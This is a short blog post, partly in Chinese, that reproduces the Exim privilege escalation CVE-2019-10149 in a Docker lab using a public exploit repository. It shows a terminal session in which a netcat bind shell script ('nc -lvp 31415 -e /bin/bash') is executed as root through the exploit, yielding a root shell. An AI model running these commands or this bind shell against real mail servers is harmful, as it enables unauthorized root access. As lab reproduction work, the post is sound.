Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

CVE-2019-10149 Exim 本地权限提升 LPE

wpadmin~September 6, 2019 /InfoSec/System Management

CVE-2019-10149 Exim 本地权限提升 LPE

<!–more–>

正文

git clone https://github.com/dhn/exploits

docker build -t vuln/cve-2019-10149 .
docker run --rm -it vuln/cve-2019-10149

测试过程

 team@blackloutus01 &gt;&gt;&gt; ~/develop/vulhub-master/exploits/CVE-2019-10149 &gt; master &gt; sudo su
[sudo] password for team: 
[root@blackloutus01 CVE-2019-10149]# docker run --rm -it vuln/cve-2019-10149
No directory, logging in with HOME=/
$ cd /tmp
$ vim sh
$ cat /tmp/sh
#!/usr/bin/env sh
nc -lvp 31415 -e /bin/bash
$ chmod +x /tmp/sh
$ ./exploit.sh 
[+] CVE-2019-10149 exploit by dhn
[+] Send mail...
[+] Execute /tmp/sh!
[+] Done
$ nc 127.0.0.1 31415
id
uid=0(root) gid=0(root) groups=0(root)
exit
$ id
uid=1000(exim) gid=1000(exim) groups=1000(exim)

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.